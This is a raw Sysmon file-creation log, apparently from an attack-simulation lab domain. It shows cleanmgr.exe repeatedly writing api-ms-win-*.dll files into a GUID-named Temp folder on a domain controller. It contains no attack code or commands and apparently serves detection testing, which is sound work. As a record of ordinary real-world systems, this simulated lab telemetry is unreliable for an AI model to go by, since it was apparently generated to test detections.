11241100x80000000000000001050773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-Controller-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-eventing-consumer-l1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-1.dll2021-07-12 07:56:58.815 11241100x80000000000000001050769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.815{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-devices-config-L1-1-0.dll2021-07-12 07:56:58.815 11241100x80000000000000001050768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-xstate-l2-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-xstate-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-wow64-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-version-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-util-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-url-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-timezone-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-private-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-legacy-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-threadpool-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-1.dll2021-07-12 07:56:58.799 11241100x80000000000000001050757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-sysinfo-l1-1-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-2-0.dll2021-07-12 07:56:58.799 11241100x80000000000000001050754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.799{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-synch-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringloader-l1-1-1.dll2021-07-12 07:56:58.783 11241100x80000000000000001050752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-stringansi-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-string-l2-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-string-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shutdown-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-shlwapi-legacy-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-rtlsupport-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l2-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-registry-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-realtime-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-profile-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processtopology-obsolete-l1-1-0.dll2021-07-12 07:56:58.783 11241100x80000000000000001050739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-2.dll2021-07-12 07:56:58.783 11241100x80000000000000001050738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.783{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processthreads-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-processenvironment-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-privateprofile-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-namedpipe-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-2.dll2021-07-12 07:56:58.767 11241100x80000000000000001050730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-memory-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-localization-obsolete-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-localization-l1-2-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-libraryloader-l1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Kernel32-Private-L1-1-0.dll2021-07-12 07:56:58.767 11241100x80000000000000001050721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.767{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-1.dll2021-07-12 07:56:58.767 11241100x80000000000000001050720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.764{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-kernel32-legacy-l1-1-0.dll2021-07-12 07:56:58.764 11241100x80000000000000001050719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.763{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-1.dll2021-07-12 07:56:58.762 11241100x80000000000000001050718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.761{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-io-l1-1-0.dll2021-07-12 07:56:58.761 11241100x80000000000000001050717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.760{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-interlocked-l1-1-0.dll2021-07-12 07:56:58.759 11241100x80000000000000001050716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.757{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dll2021-07-12 07:56:58.757 11241100x80000000000000001050715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.757{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-heap-l1-1-0.dll2021-07-12 07:56:58.757 11241100x80000000000000001050714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.756{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-handle-l1-1-0.dll2021-07-12 07:56:58.756 11241100x80000000000000001050713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.755{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-1.dll2021-07-12 07:56:58.755 11241100x80000000000000001050712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.755{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-core-file-l2-1-0.dll2021-07-12 07:56:58.754 11241100x80000000000000001050711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.754{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-1.dll2021-07-12 07:56:58.752 11241100x80000000000000001050710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.752{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-2-0.dll2021-07-12 07:56:58.752 11241100x80000000000000001050709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.751{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-file-l1-1-0.dll2021-07-12 07:56:58.751 11241100x80000000000000001050708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.751{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-1.dll2021-07-12 07:56:58.750 11241100x80000000000000001050707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.750{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-fibers-l1-1-0.dll2021-07-12 07:56:58.750 11241100x80000000000000001050706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.749{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-1.dll2021-07-12 07:56:58.749 11241100x80000000000000001050705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.749{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-errorhandling-l1-1-0.dll2021-07-12 07:56:58.749 11241100x80000000000000001050704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.748{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-delayload-l1-1-0.dll2021-07-12 07:56:58.747 11241100x80000000000000001050703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.746{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-1.dll2021-07-12 07:56:58.746 11241100x80000000000000001050702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.746{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-debug-l1-1-0.dll2021-07-12 07:56:58.746 11241100x80000000000000001050701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.745{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-1.dll2021-07-12 07:56:58.745 11241100x80000000000000001050700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-datetime-l1-1-0.dll2021-07-12 07:56:58.744 